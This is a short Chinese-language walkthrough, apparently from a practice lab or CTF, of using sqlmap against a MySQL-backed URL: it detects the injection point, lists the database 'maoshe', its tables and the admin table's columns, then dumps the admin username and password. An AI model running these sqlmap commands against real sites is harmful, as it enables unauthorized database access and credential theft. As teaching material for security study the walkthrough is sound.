1. 判断是否存在注入点。并且根据显示内容得知数据库管理系统为MySQL
构造语句 sqlmap.py -u "url"
2.通过参数 --current-db(获取当前使用的数据库)
构造语句 sqlmap.py -u "url" --current-db
获得数据库名字
3. 通过参数 -D XX(指定数据库名),--tables获取 XX数据库的表名
构造语句sqlmap.py -u "url" -D maoshe --tables
获取到XX数据库(maoshe)的4个数据表名,其中admin存在帐号密码的字段可能性最大
4.通过参数 -D maoshe指定数据库名,-T admin指定数据表名,参数--columns获取admin数据表的字段
构造语句sqlmap.py -u "url" -D maoshe -T admin --columns
5. 通过参数 --dump把当前使用的数据库导出为csv文件
得到 管理员账户为admin 密码为hellohack